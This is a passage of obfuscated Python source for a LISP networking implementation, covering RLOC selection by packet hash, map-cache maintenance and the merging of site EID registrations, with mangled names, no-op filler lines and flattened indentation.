if 4 - 4: I11i * I11i - Ii1I * oO0o . I1ii11iIi11i % o0oOOo0O0Ooo
I1iiiiIIiiI1i = 256
for OooOOoOO0OO in self . rloc_set :
if ( OooOOoOO0OO . up_state ( ) ) : I1iiiiIIiiI1i = min ( OooOOoOO0OO . priority , I1iiiiIIiiI1i )
if 65 - 65: OoooooooOO . OOooOOo
if 83 - 83: I1Ii111 . oO0o - O0
if 32 - 32: O0 % O0
if 66 - 66: iII111i / i1IIi - Oo0Ooo . Ii1I
if 65 - 65: I1ii11iIi11i % ooOoO0o - OoOoOO00 + ooOoO0o + Oo0Ooo
if 95 - 95: I1Ii111 * i11iIiiIii - I1IiiI - OoOoOO00 . ooOoO0o
if 34 - 34: OoooooooOO % I1ii11iIi11i + OoooooooOO % i11iIiiIii / IiII - ooOoO0o
if 74 - 74: iIii1I11I1II1 % II111iiii + IiII
if 71 - 71: I1IiiI / O0 * i1IIi . i1IIi + Oo0Ooo
if 32 - 32: i1IIi * I1Ii111 % I1IiiI / IiII . I1Ii111
for OooOOoOO0OO in self . rloc_set :
if ( OooOOoOO0OO . priority <= I1iiiiIIiiI1i ) :
if ( OooOOoOO0OO . unreach_state ( ) and OooOOoOO0OO . last_rloc_probe == None ) :
OooOOoOO0OO . last_rloc_probe = lisp_get_timestamp ( )
if 11 - 11: OOooOOo
self . best_rloc_set . append ( OooOOoOO0OO )
if 25 - 25: i1IIi
if 99 - 99: OOooOOo + OoooooooOO . I1Ii111 * Oo0Ooo % oO0o
if 75 - 75: iII111i
if 8 - 8: I1ii11iIi11i . I11i / I1ii11iIi11i - i1IIi
if 22 - 22: OOooOOo
if 7 - 7: O0 - I1ii11iIi11i - OoO0O00 * I1Ii111
if 17 - 17: o0oOOo0O0Ooo % OoO0O00 - I11i * o0oOOo0O0Ooo - i1IIi / I1IiiI
if 100 - 100: OoO0O00 * i1IIi * o0oOOo0O0Ooo * Oo0Ooo - o0oOOo0O0Ooo
for OooOOoOO0OO in I1i1 :
if ( OooOOoOO0OO . priority < I1iiiiIIiiI1i ) : continue
OooOOoOO0OO . delete_from_rloc_probe_list ( self . eid , self . group )
if 100 - 100: iII111i - i11iIiiIii + OoO0O00
for OooOOoOO0OO in self . best_rloc_set :
if ( OooOOoOO0OO . rloc . is_null ( ) ) : continue
OooOOoOO0OO . add_to_rloc_probe_list ( self . eid , self . group )
if 50 - 50: II111iiii
if 42 - 42: OOooOOo * I1Ii111
if 53 - 53: II111iiii % OOooOOo / I1ii11iIi11i * OoOoOO00 % I1ii11iIi11i * iII111i
def select_rloc ( self , lisp_packet , ipc_socket ) :
OO0Oo00OO0oo = lisp_packet . packet
o0ooooOO000 = lisp_packet . inner_version
iI = len ( self . best_rloc_set )
if ( iI == 0 ) :
self . stats . increment ( len ( OO0Oo00OO0oo ) )
return ( [ None , None , None , self . action , None , None ] )
if 20 - 20: I1IiiI % Oo0Ooo - OoO0O00 - I1Ii111 - II111iiii
if 79 - 79: II111iiii - II111iiii + OoOoOO00 / iII111i % OoooooooOO - OoO0O00
iIi1I1I = 4 if lisp_load_split_pings else 0
iiIIII11iIii = lisp_packet . hash_ports ( )
if ( o0ooooOO000 == 4 ) :
for OoOOoO0oOo in range ( 8 + iIi1I1I ) :
iiIIII11iIii = iiIIII11iIii ^ struct . unpack ( "B" , OO0Oo00OO0oo [ OoOOoO0oOo + 12 : OoOOoO0oOo + 13 ] ) [ 0 ]
if 41 - 41: I11i
elif ( o0ooooOO000 == 6 ) :
for OoOOoO0oOo in range ( 0 , 32 + iIi1I1I , 4 ) :
iiIIII11iIii = iiIIII11iIii ^ struct . unpack ( "I" , OO0Oo00OO0oo [ OoOOoO0oOo + 8 : OoOOoO0oOo + 12 ] ) [ 0 ]
if 31 - 31: OOooOOo + O0 * OOooOOo
iiIIII11iIii = ( iiIIII11iIii >> 16 ) + ( iiIIII11iIii & 0xffff )
iiIIII11iIii = ( iiIIII11iIii >> 8 ) + ( iiIIII11iIii & 0xff )
else :
for OoOOoO0oOo in range ( 0 , 12 + iIi1I1I , 4 ) :
iiIIII11iIii = iiIIII11iIii ^ struct . unpack ( "I" , OO0Oo00OO0oo [ OoOOoO0oOo : OoOOoO0oOo + 4 ] ) [ 0 ]
if 81 - 81: i11iIiiIii + iIii1I11I1II1 . i11iIiiIii / OOooOOo / iII111i
if 34 - 34: i11iIiiIii - o0oOOo0O0Ooo * OoooooooOO * I1ii11iIi11i * Oo0Ooo % I1ii11iIi11i
if 31 - 31: I11i . o0oOOo0O0Ooo
if ( lisp_data_plane_logging ) :
o0O0OOo0O = [ ]
for I1I1iIiiiiII11 in self . best_rloc_set :
if ( I1I1iIiiiiII11 . rloc . is_null ( ) ) : continue
o0O0OOo0O . append ( [ I1I1iIiiiiII11 . rloc . print_address_no_iid ( ) , I1I1iIiiiiII11 . print_state ( ) ] )
if 53 - 53: OOooOOo
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( iiIIII11iIii ) , iiIIII11iIii % iI , red ( str ( o0O0OOo0O ) , False ) ) )
if 80 - 80: oO0o % I1ii11iIi11i * I1Ii111 + i1IIi
if 79 - 79: oO0o + IiII
if 4 - 4: iII111i + OoooooooOO / I1Ii111
if 57 - 57: I1IiiI . iIii1I11I1II1 % iII111i * iII111i / I1Ii111
if 30 - 30: O0 / I11i % OoOoOO00 * I1Ii111 / O0 % ooOoO0o
if 36 - 36: iIii1I11I1II1 . iII111i * I1IiiI . I1IiiI - IiII
OooOOoOO0OO = self . best_rloc_set [ iiIIII11iIii % iI ]
if 39 - 39: O0 / ooOoO0o + I11i - OoOoOO00 * o0oOOo0O0Ooo - OoO0O00
if 97 - 97: i11iIiiIii / O0 % OoO0O00
if 88 - 88: i1IIi . I1IiiI
if 8 - 8: I1ii11iIi11i . OoO0O00 % o0oOOo0O0Ooo / O0
if 51 - 51: oO0o + Ii1I * Ii1I * I1ii11iIi11i % I11i - I1ii11iIi11i
oo000O0o = lisp_get_echo_nonce ( OooOOoOO0OO . rloc , None )
if ( oo000O0o ) :
oo000O0o . change_state ( OooOOoOO0OO )
if ( OooOOoOO0OO . no_echoed_nonce_state ( ) ) :
oo000O0o . request_nonce_sent = None
if 15 - 15: i1IIi / OoO0O00 - Oo0Ooo
if 74 - 74: o0oOOo0O0Ooo % Ii1I - II111iiii / ooOoO0o
if 84 - 84: I1IiiI + OOooOOo
if 80 - 80: OOooOOo / OoOoOO00
if 93 - 93: OOooOOo
if 82 - 82: iIii1I11I1II1 + OoO0O00 / iIii1I11I1II1 . iIii1I11I1II1
if ( OooOOoOO0OO . up_state ( ) == False ) :
I1IIII1i1i1 = iiIIII11iIii % iI
OOOooo0OooOoO = ( I1IIII1i1i1 + 1 ) % iI
while ( OOOooo0OooOoO != I1IIII1i1i1 ) :
OooOOoOO0OO = self . best_rloc_set [ OOOooo0OooOoO ]
if ( OooOOoOO0OO . up_state ( ) ) : break
OOOooo0OooOoO = ( OOOooo0OooOoO + 1 ) % iI
if 92 - 92: O0 * OoooooooOO + I1ii11iIi11i / IiII
if ( OOOooo0OooOoO == I1IIII1i1i1 ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 97 - 97: o0oOOo0O0Ooo . Ii1I + I1Ii111
if 72 - 72: i11iIiiIii . iII111i . Ii1I * I1ii11iIi11i
if 49 - 49: OoOoOO00 - O0 % I11i - ooOoO0o * OOooOOo
if 58 - 58: OoooooooOO - OOooOOo * oO0o / Ii1I . IiII
if 50 - 50: IiII . OOooOOo + I1ii11iIi11i - OoooooooOO
if 2 - 2: o0oOOo0O0Ooo % ooOoO0o / O0 / i11iIiiIii
OooOOoOO0OO . stats . increment ( len ( OO0Oo00OO0oo ) )
if 91 - 91: II111iiii * o0oOOo0O0Ooo
if 20 - 20: iIii1I11I1II1 % Oo0Ooo * OoOoOO00 % IiII
if 93 - 93: I11i * iIii1I11I1II1 * oO0o
if 74 - 74: I1IiiI
if ( OooOOoOO0OO . rle_name and OooOOoOO0OO . rle == None ) :
if ( OooOOoOO0OO . rle_name in lisp_rle_list ) :
OooOOoOO0OO . rle = lisp_rle_list [ OooOOoOO0OO . rle_name ]
if 39 - 39: iII111i * IiII / iII111i * IiII % I1ii11iIi11i
if 27 - 27: iIii1I11I1II1 . ooOoO0o
if ( OooOOoOO0OO . rle ) : return ( [ None , None , None , None , OooOOoOO0OO . rle , None ] )
if 74 - 74: i1IIi % OoOoOO00
if 98 - 98: IiII * OOooOOo / O0 - I1Ii111 . I1Ii111 + OOooOOo
if 61 - 61: iII111i * Ii1I % Ii1I + I1IiiI
if 23 - 23: oO0o + I1Ii111 / OoooooooOO / O0 + IiII
if ( OooOOoOO0OO . elp and OooOOoOO0OO . elp . use_elp_node ) :
return ( [ OooOOoOO0OO . elp . use_elp_node . address , None , None , None , None ,
None ] )
if 80 - 80: i11iIiiIii - OoooooooOO + II111iiii / i1IIi - oO0o
if 100 - 100: Ii1I
if 73 - 73: IiII - O0
if 54 - 54: OOooOOo
if 28 - 28: i1IIi - Oo0Ooo * OoO0O00 + OoooooooOO - Ii1I * i11iIiiIii
O0o00ooOo = None if ( OooOOoOO0OO . rloc . is_null ( ) ) else OooOOoOO0OO . rloc
O00oo0o0o0oo = OooOOoOO0OO . translated_port
oOoO0OooO0O = self . action if ( O0o00ooOo == None ) else None
if 52 - 52: O0 % iIii1I11I1II1
if 19 - 19: IiII % II111iiii
if 10 - 10: iIii1I11I1II1 * OoooooooOO . OOooOOo . I11i * O0 - i11iIiiIii
if 25 - 25: I11i % Ii1I
if 13 - 13: iIii1I11I1II1 - I1IiiI % o0oOOo0O0Ooo * iIii1I11I1II1
OOO0O0O = None
if ( oo000O0o and oo000O0o . request_nonce_timeout ( ) == False ) :
OOO0O0O = oo000O0o . get_request_or_echo_nonce ( ipc_socket , O0o00ooOo )
if 99 - 99: OoooooooOO / II111iiii . I1Ii111
if 62 - 62: OOooOOo . iII111i . I1ii11iIi11i
if 23 - 23: O0
if 33 - 33: ooOoO0o - iII111i % IiII
if 67 - 67: II111iiii
return ( [ O0o00ooOo , O00oo0o0o0oo , OOO0O0O , oOoO0OooO0O , None , OooOOoOO0OO ] )
if 66 - 66: iIii1I11I1II1 / OOooOOo
if 65 - 65: IiII . oO0o + O0 - i11iIiiIii + iIii1I11I1II1
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 82 - 82: iIii1I11I1II1 * iII111i + iIii1I11I1II1 / OoO0O00 + O0
if 67 - 67: I1Ii111
if 94 - 94: I1Ii111 % iIii1I11I1II1 - II111iiii . ooOoO0o + i11iIiiIii - i11iIiiIii
if 55 - 55: OoooooooOO % iIii1I11I1II1 % I1ii11iIi11i % i1IIi
if 46 - 46: I11i - ooOoO0o . I1IiiI
for iII in self . rloc_set :
for OooOOoOO0OO in rloc_address_set :
if ( OooOOoOO0OO . is_exact_match ( iII . rloc ) == False ) : continue
OooOOoOO0OO = None
break
if 36 - 36: I11i + OoO0O00 * O0 * OoOoOO00 * iII111i
if ( OooOOoOO0OO == rloc_address_set [ - 1 ] ) : return ( False )
if 90 - 90: i11iIiiIii / i1IIi
return ( True )
if 35 - 35: Ii1I . I11i / oO0o / OoOoOO00
if 5 - 5: I1ii11iIi11i . o0oOOo0O0Ooo * iII111i * I1ii11iIi11i % I1Ii111
def get_rloc ( self , rloc ) :
for iII in self . rloc_set :
I1I1iIiiiiII11 = iII . rloc
if ( rloc . is_exact_match ( I1I1iIiiiiII11 ) ) : return ( iII )
if 83 - 83: iIii1I11I1II1 * o0oOOo0O0Ooo % i11iIiiIii + OoO0O00 . O0
return ( None )
if 87 - 87: II111iiii - iIii1I11I1II1 % I11i % I1IiiI . o0oOOo0O0Ooo
if 52 - 52: i11iIiiIii . oO0o / OoooooooOO - OoO0O00
def get_rloc_by_interface ( self , interface ) :
for iII in self . rloc_set :
if ( iII . interface == interface ) : return ( iII )
if 7 - 7: I1IiiI * I1IiiI % OOooOOo % iIii1I11I1II1 * OoO0O00 . o0oOOo0O0Ooo
return ( None )
if 32 - 32: ooOoO0o / i1IIi
if 55 - 55: oO0o . OoOoOO00 + OoooooooOO - ooOoO0o . OoooooooOO
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
II1II1Iii1I = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( II1II1Iii1I == None ) :
II1II1Iii1I = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , II1II1Iii1I )
if 77 - 77: I1IiiI
II1II1Iii1I . add_source_entry ( self )
if 16 - 16: I1IiiI + ooOoO0o - O0 / o0oOOo0O0Ooo
if 36 - 36: Oo0Ooo - OoOoOO00 - II111iiii
if 25 - 25: i11iIiiIii + II111iiii * OOooOOo % OOooOOo
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
I11 = lisp_map_cache . lookup_cache ( self . group , True )
if ( I11 == None ) :
I11 = lisp_mapping ( self . group , self . group , [ ] )
I11 . eid . copy_address ( self . group )
I11 . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , I11 )
if 87 - 87: I11i % Ii1I % Oo0Ooo . II111iiii / oO0o
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( I11 . group )
I11 . add_source_entry ( self )
if 19 - 19: O0 . OOooOOo + I1Ii111 * I1ii11iIi11i
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
if 91 - 91: o0oOOo0O0Ooo / oO0o . o0oOOo0O0Ooo + IiII + ooOoO0o . I1Ii111
if 90 - 90: i1IIi + oO0o * oO0o / ooOoO0o . IiII
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if 98 - 98: I11i % OoO0O00 . iII111i - o0oOOo0O0Ooo
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
oO00Ooo0O0 = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( oO00Ooo0O0 ) )
if 39 - 39: O0 . ooOoO0o
else :
I11 = lisp_map_cache . lookup_cache ( self . group , True )
if ( I11 == None ) : return
if 38 - 38: Oo0Ooo * OoO0O00 * i11iIiiIii / iII111i % iII111i
IiIiI1I1iIii = I11 . lookup_source_cache ( self . eid , True )
if ( IiIiI1I1iIii == None ) : return
if 94 - 94: ooOoO0o * ooOoO0o + o0oOOo0O0Ooo . iII111i % iIii1I11I1II1 + Ii1I
I11 . source_cache . delete_cache ( self . eid )
if ( I11 . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
if 88 - 88: Oo0Ooo . iII111i
if 89 - 89: OOooOOo + I1Ii111 % i11iIiiIii + Oo0Ooo / Oo0Ooo + OoO0O00
if 9 - 9: OoOoOO00 % i1IIi + IiII
if 19 - 19: I1Ii111 - II111iiii / I1Ii111 + I1IiiI - OoooooooOO + o0oOOo0O0Ooo
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 100 - 100: OoO0O00 / OoOoOO00 / OOooOOo / OoO0O00
if 95 - 95: ooOoO0o
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 95 - 95: Ii1I + i1IIi . I1IiiI % I1Ii111 / Ii1I * O0
if 68 - 68: I1Ii111 - IiII - oO0o - Oo0Ooo - o0oOOo0O0Ooo
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
if 32 - 32: OoOoOO00 % i11iIiiIii
if 53 - 53: I1Ii111 * Ii1I / IiII . i1IIi * II111iiii / o0oOOo0O0Ooo
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
i1oO00O = "," + str ( self . secondary_iid )
return ( prefix . replace ( i1oO00O , i1oO00O + "*" ) )
if 44 - 44: I1Ii111 + ooOoO0o
if 15 - 15: I11i + OoO0O00 + OoOoOO00
def increment_decap_stats ( self , packet ) :
O00oo0o0o0oo = packet . udp_dport
if ( O00oo0o0o0oo == LISP_DATA_PORT ) :
OooOOoOO0OO = self . get_rloc ( packet . outer_dest )
else :
if 100 - 100: I1Ii111
if 78 - 78: OoOoOO00
if 16 - 16: I1Ii111 % OoO0O00 - OoO0O00 % OoOoOO00 * OoO0O00
if 36 - 36: OoOoOO00 * II111iiii . OoooooooOO * I11i . I11i
for OooOOoOO0OO in self . rloc_set :
if ( OooOOoOO0OO . translated_port != 0 ) : break
if 13 - 13: I1ii11iIi11i * II111iiii
if 93 - 93: OOooOOo / O0 - o0oOOo0O0Ooo + OoO0O00 * I1IiiI
if ( OooOOoOO0OO != None ) : OooOOoOO0OO . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
if 53 - 53: I1ii11iIi11i
if 91 - 91: o0oOOo0O0Ooo - I1ii11iIi11i . i1IIi
def rtrs_in_rloc_set ( self ) :
for OooOOoOO0OO in self . rloc_set :
if ( OooOOoOO0OO . is_rtr ( ) ) : return ( True )
if 64 - 64: ooOoO0o
return ( False )
if 23 - 23: Oo0Ooo . OoO0O00
if 49 - 49: oO0o % i11iIiiIii * Ii1I
def add_recent_source ( self , source ) :
self . recent_sources [ source . print_address ( ) ] = lisp_get_timestamp ( )
if 9 - 9: Oo0Ooo - OoO0O00 + ooOoO0o / o0oOOo0O0Ooo
if 61 - 61: O0 - i11iIiiIii * o0oOOo0O0Ooo
if 92 - 92: Oo0Ooo + OOooOOo - i11iIiiIii
class lisp_dynamic_eid ( object ) :
def __init__ ( self ) :
self . dynamic_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . interface = None
self . last_packet = None
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 26 - 26: O0 % Oo0Ooo + ooOoO0o - Ii1I . Oo0Ooo
if 33 - 33: I1Ii111 / iII111i . I1Ii111 % II111iiii
def get_timeout ( self , interface ) :
try :
oo0Oo0O0 = lisp_myinterfaces [ interface ]
self . timeout = oo0Oo0O0 . dynamic_eid_timeout
except :
self . timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 49 - 49: Ii1I * OoooooooOO * i1IIi % OoOoOO00
if 83 - 83: iIii1I11I1II1 - i1IIi - Ii1I % iII111i
if 69 - 69: I1Ii111 * oO0o * I1IiiI
if 74 - 74: O0 / I11i . Oo0Ooo / I11i % OoO0O00 % o0oOOo0O0Ooo
class lisp_group_mapping ( object ) :
def __init__ ( self , group_name , ms_name , group_prefix , sources , rle_addr ) :
self . group_name = group_name
self . group_prefix = group_prefix
self . use_ms_name = ms_name
self . sources = sources
self . rle_address = rle_addr
if 83 - 83: OoO0O00 - i11iIiiIii + iIii1I11I1II1
if 52 - 52: OoooooooOO
def add_group ( self ) :
lisp_group_mapping_list [ self . group_name ] = self
if 44 - 44: O0 / OoooooooOO + ooOoO0o * I1ii11iIi11i
if 36 - 36: I1ii11iIi11i / OoO0O00 - oO0o % O0
if 12 - 12: i1IIi * ooOoO0o / oO0o + I1IiiI / OoooooooOO
if 86 - 86: Oo0Ooo / OoO0O00
if 78 - 78: I1IiiI * I1IiiI
if 13 - 13: oO0o
if 43 - 43: oO0o / Ii1I % OOooOOo
if 45 - 45: II111iiii
if 41 - 41: Ii1I / OOooOOo * Oo0Ooo . O0 - i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo + I1IiiI + I1Ii111 / I1ii11iIi11i * i1IIi
def lisp_is_group_more_specific ( group_str , group_mapping ) :
i1oO00O = group_mapping . group_prefix . instance_id
ooOoO00 = group_mapping . group_prefix . mask_len
o0o0o = lisp_address ( LISP_AFI_IPV4 , group_str , 32 , i1oO00O )
if ( o0o0o . is_more_specific ( group_mapping . group_prefix ) ) : return ( ooOoO00 )
return ( - 1 )
if 37 - 37: O0 + iIii1I11I1II1 % IiII * oO0o
if 43 - 43: OOooOOo . O0
if 76 - 76: OOooOOo * OoooooooOO / IiII . OoO0O00 + II111iiii
if 23 - 23: OoO0O00 - OoooooooOO * I11i . iIii1I11I1II1 / o0oOOo0O0Ooo + oO0o
if 74 - 74: II111iiii / I1IiiI * O0 * OoO0O00 . I11i
if 74 - 74: O0 . i1IIi / I1ii11iIi11i + o0oOOo0O0Ooo
if 24 - 24: ooOoO0o % I1Ii111 + OoO0O00 * o0oOOo0O0Ooo % O0 - i11iIiiIii
def lisp_lookup_group ( group ) :
o0O0OOo0O = None
for iIII in list ( lisp_group_mapping_list . values ( ) ) :
ooOoO00 = lisp_is_group_more_specific ( group , iIII )
if ( ooOoO00 == - 1 ) : continue
if ( o0O0OOo0O == None or ooOoO00 > o0O0OOo0O . group_prefix . mask_len ) : o0O0OOo0O = iIII
if 85 - 85: o0oOOo0O0Ooo / o0oOOo0O0Ooo + Oo0Ooo * II111iiii + Ii1I * Ii1I
return ( o0O0OOo0O )
if 26 - 26: o0oOOo0O0Ooo + oO0o * i11iIiiIii / II111iiii
if 86 - 86: Ii1I
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 69 - 69: oO0o % o0oOOo0O0Ooo / o0oOOo0O0Ooo
class lisp_site ( object ) :
def __init__ ( self ) :
self . site_name = ""
self . description = ""
self . shutdown = False
self . auth_sha1_or_sha2 = False
self . auth_key = { }
self . encryption_key = None
self . allowed_prefixes = { }
self . allowed_prefixes_sorted = [ ]
self . allowed_rlocs = { }
self . map_notifies_sent = 0
self . map_notify_acks_received = 0
if 1 - 1: Ii1I
if 43 - 43: o0oOOo0O0Ooo
if 78 - 78: I1Ii111 % i1IIi * I11i
class lisp_site_eid ( object ) :
def __init__ ( self , site ) :
self . site = site
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . first_registered = 0
self . last_registered = 0
self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
self . registered = False
self . registered_rlocs = [ ]
self . auth_sha1_or_sha2 = False
self . individual_registrations = { }
self . map_registers_received = 0
self . proxy_reply_requested = False
self . force_proxy_reply = False
self . force_nat_proxy_reply = False
self . force_ttl = None
self . pitr_proxy_reply_drop = False
self . proxy_reply_action = ""
self . lisp_sec_present = False
self . map_notify_requested = False
self . mobile_node_requested = False
self . echo_nonce_capable = False
self . use_register_ttl_requested = False
self . merge_register_requested = False
self . xtr_id_present = False
self . xtr_id = 0
self . site_id = 0
self . accept_more_specifics = False
self . parent_for_more_specifics = None
self . dynamic = False
self . more_specific_registrations = [ ]
self . source_cache = None
self . inconsistent_registration = False
self . policy = None
self . require_signature = False
self . encrypt_json = False
if 59 - 59: OoOoOO00 % OoO0O00 % i11iIiiIii . II111iiii % I1ii11iIi11i + i1IIi
if 99 - 99: I11i + IiII * I1Ii111 - OOooOOo - i1IIi
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 77 - 77: I11i . IiII / OoO0O00 / I1Ii111
if 8 - 8: o0oOOo0O0Ooo + iII111i / OoO0O00 * ooOoO0o - oO0o . iII111i
def print_flags ( self , html ) :
if ( html == False ) :
OoiIIIiIi1I1i = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# iIii1I11I1II1 + OoooooooOO
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
ii1i = self . print_flags ( False )
ii1i = ii1i . split ( "-" )
OoiIIIiIi1I1i = ""
for OooOooOO in ii1i :
I1II11 = lisp_site_flags [ OooOooOO . upper ( ) ]
I1II11 = I1II11 . format ( "" if OooOooOO . isupper ( ) else "not " )
OoiIIIiIi1I1i += lisp_span ( OooOooOO , I1II11 )
if ( OooOooOO . lower ( ) != "n" ) : OoiIIIiIi1I1i += "-"
if 81 - 81: I1Ii111
if 85 - 85: O0 % OoOoOO00 . I1ii11iIi11i
return ( OoiIIIiIi1I1i )
if 46 - 46: OOooOOo * iIii1I11I1II1
if 33 - 33: OoO0O00 * II111iiii / i1IIi
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
self . first_registered = child . first_registered
self . last_registered = child . last_registered
self . last_registerer = child . last_registerer
self . register_ttl = child . register_ttl
if ( self . registered == False ) :
self . first_registered = lisp_get_timestamp ( )
if 93 - 93: I1Ii111 % I11i
self . auth_sha1_or_sha2 = child . auth_sha1_or_sha2
self . registered = child . registered
self . proxy_reply_requested = child . proxy_reply_requested
self . lisp_sec_present = child . lisp_sec_present
self . xtr_id_present = child . xtr_id_present
self . use_register_ttl_requested = child . use_register_ttl_requested
self . merge_register_requested = child . merge_register_requested
self . mobile_node_requested = child . mobile_node_requested
self . map_notify_requested = child . map_notify_requested
if 64 - 64: I1IiiI % OoOoOO00 / Oo0Ooo
if 40 - 40: Ii1I + iIii1I11I1II1 / oO0o . II111iiii % O0 - IiII
def build_sort_key ( self ) :
I111i1iI = lisp_cache ( )
O00o00 , III11II111 = I111i1iI . build_key ( self . eid )
OOo00OO = ""
if ( self . group . is_null ( ) == False ) :
Oo0O0O , OOo00OO = I111i1iI . build_key ( self . group )
OOo00OO = "-" + OOo00OO [ 0 : 12 ] + "-" + str ( Oo0O0O ) + "-" + OOo00OO [ 12 : : ]
if 52 - 52: i11iIiiIii + i11iIiiIii - i1IIi . i11iIiiIii - ooOoO0o + OoooooooOO
III11II111 = III11II111 [ 0 : 12 ] + "-" + str ( O00o00 ) + "-" + III11II111 [ 12 : : ] + OOo00OO
del ( I111i1iI )
return ( III11II111 )
if 50 - 50: OoooooooOO . OoOoOO00 * o0oOOo0O0Ooo / O0 % I1IiiI + Oo0Ooo
if 75 - 75: OoO0O00 * Oo0Ooo . OOooOOo . OoO0O00 * Oo0Ooo * iIii1I11I1II1
def merge_in_site_eid ( self , child ) :
IIII1II1 = False
if ( self . group . is_null ( ) ) :
self . merge_rlocs_in_site_eid ( )
else :
IIII1II1 = self . merge_rles_in_site_eid ( )
if 10 - 10: OoooooooOO . I11i / I1Ii111 % i11iIiiIii % iIii1I11I1II1
if 65 - 65: IiII % OOooOOo / o0oOOo0O0Ooo * II111iiii - oO0o
if 38 - 38: I1Ii111 * o0oOOo0O0Ooo
if 32 - 32: iII111i / Ii1I / I1Ii111 - OoOoOO00 / OOooOOo * OoO0O00
if 32 - 32: I1ii11iIi11i + ooOoO0o . i1IIi * iIii1I11I1II1 - I1IiiI
if 9 - 9: I11i % i1IIi / ooOoO0o % iII111i - oO0o - II111iiii
if ( child != None ) :
self . copy_state_to_parent ( child )
self . map_registers_received += 1
if 29 - 29: ooOoO0o . II111iiii . i1IIi % oO0o
return ( IIII1II1 )
if 11 - 11: OoOoOO00 . OoO0O00 % I11i * iII111i % I1Ii111 . O0
if 17 - 17: OOooOOo / i11iIiiIii - i11iIiiIii . II111iiii . ooOoO0o
def copy_rloc_records ( self ) :
IIiiiIiI = [ ]
for iII in self . registered_rlocs :
IIiiiIiI . append ( copy . deepcopy ( iII ) )
if 16 - 16: OoO0O00 . Oo0Ooo + oO0o + Ii1I - OoooooooOO . ooOoO0o
return ( IIiiiIiI )
if 44 - 44: O0
if 91 - 91: ooOoO0o * OoOoOO00 * i1IIi * o0oOOo0O0Ooo - ooOoO0o % Ii1I
def merge_rlocs_in_site_eid ( self ) :
self . registered_rlocs = [ ]
for i1iI11i in list ( self . individual_registrations . values ( ) ) :
if ( self . site_id != i1iI11i . site_id ) : continue
if ( i1iI11i . registered == False ) : continue
self . registered_rlocs += i1iI11i . copy_rloc_records ( )
if 46 - 46: O0 / iIii1I11I1II1
if 65 - 65: OOooOOo
if 88 - 88: OOooOOo * iIii1I11I1II1 + I11i . iII111i
if 55 - 55: I1IiiI + Ii1I % I1ii11iIi11i + iIii1I11I1II1
if 64 - 64: i1IIi / O0 - oO0o
if 7 - 7: IiII . IiII * Ii1I
IIiiiIiI = [ ]
for iII in self . registered_rlocs :
if ( iII . rloc . is_null ( ) or len ( IIiiiIiI ) == 0 ) :
IIiiiIiI . append ( iII )
continue
if 1 - 1: i11iIiiIii
for OOiIII1 in IIiiiIiI :
if ( OOiIII1 . rloc . is_null ( ) ) : continue
if ( iII . rloc . is_exact_match ( OOiIII1 . rloc ) ) : break
if 20 - 20: o0oOOo0O0Ooo . I1Ii111 + O0
if ( OOiIII1 == IIiiiIiI [ - 1 ] ) : IIiiiIiI . append ( iII )
if 99 - 99: O0 / IiII . oO0o
self . registered_rlocs = IIiiiIiI
if 18 - 18: OoooooooOO * OoO0O00 * I1Ii111
if 12 - 12: i11iIiiIii / iIii1I11I1II1 . I11i % I1Ii111 * ooOoO0o % ooOoO0o
if 13 - 13: i1IIi . ooOoO0o . ooOoO0o
if 24 - 24: iIii1I11I1II1
if ( len ( self . registered_rlocs ) == 0 ) : self . registered = False
return
